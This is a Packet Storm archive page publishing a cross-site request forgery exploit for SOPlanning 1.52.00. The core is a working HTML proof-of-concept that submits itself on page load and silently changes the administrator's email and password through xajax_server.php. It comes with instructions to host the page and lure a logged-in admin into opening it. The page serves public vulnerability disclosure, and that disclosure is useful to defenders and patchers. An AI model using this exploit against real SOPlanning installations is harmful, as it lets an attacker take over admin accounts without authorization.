exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SOPlanning 1.52.00 Cross Site Request Forgery

SOPlanning 1.52.00 Cross Site Request Forgery
Posted May 3, 2024
Authored by liquidsky

SOPlanning version 1.52.00 suffers from a cross site request forgery vulnerability in xajax_server.php.

tags | exploit, php, csrf
SHA-256 | a3c73b7d4acc8e32c7247c327692a33f62025c56af9edaa24b5dfff34103fc5a

SOPlanning 1.52.00 Cross Site Request Forgery

Change Mirror Download
<!--
Exploit Title: SOPlanning v1.52.00 'xajax_server.php' CSRF (Account Takeover)
Application: SOPlanning
Version: 1.52.00
Date: 4/22/24
Exploit Author: Joseph McPeters (Liquidsky)
Vendor Homepage: https://www.soplanning.org/en/
Software Link: https://sourceforge.net/projects/soplanning/
Tested on: Linux
CVE: Not yet assigned

Description: SOPlanning v1.52.00 is vulnerable to CSRF via 'xajax_server.php' a remote unautheticated attacker can hijack the admin account. The remote attacker can force the admins browser to make requests by sending them to an external page and update the admins password and email therefore taking over the admin panel.

Instructions: Host the exploit code included and have the admin visit the CSRF exploit page while logged in. It will be noticed that the password and email for the main admin have been changed to the specified email and password.

Liquidsky @ Specialized Security Services Inc. (S3) | Shout out to the team!
-->

<html>
<body>
<form action=https://fuzzlove.website/www/process/xajax_server.php method="POST">
<input type="hidden" name="xajax" value="submitFormProfil" />
<input type="hidden" name="xajaxr" value="" />
<input type="hidden" name="xajaxargs[]" value="ADM" />
<!-- Update with attack email to change the admins email to yours -->
<input type="hidden" name="xajaxargs[]" value=pwn@mail.lv<mailto:pwn@mail.lv> />
<!-- Update the following field to change the admins password to the password in the field -->
<input type="hidden" name="xajaxargs[]" value="password" />
<input type="hidden" name="xajaxargs[]" value="fr" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="false" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="false" />
<input type="hidden" name="xajaxargs[]" value="0" />
<input type="hidden" name="xajaxargs[]" value="1" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>



Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close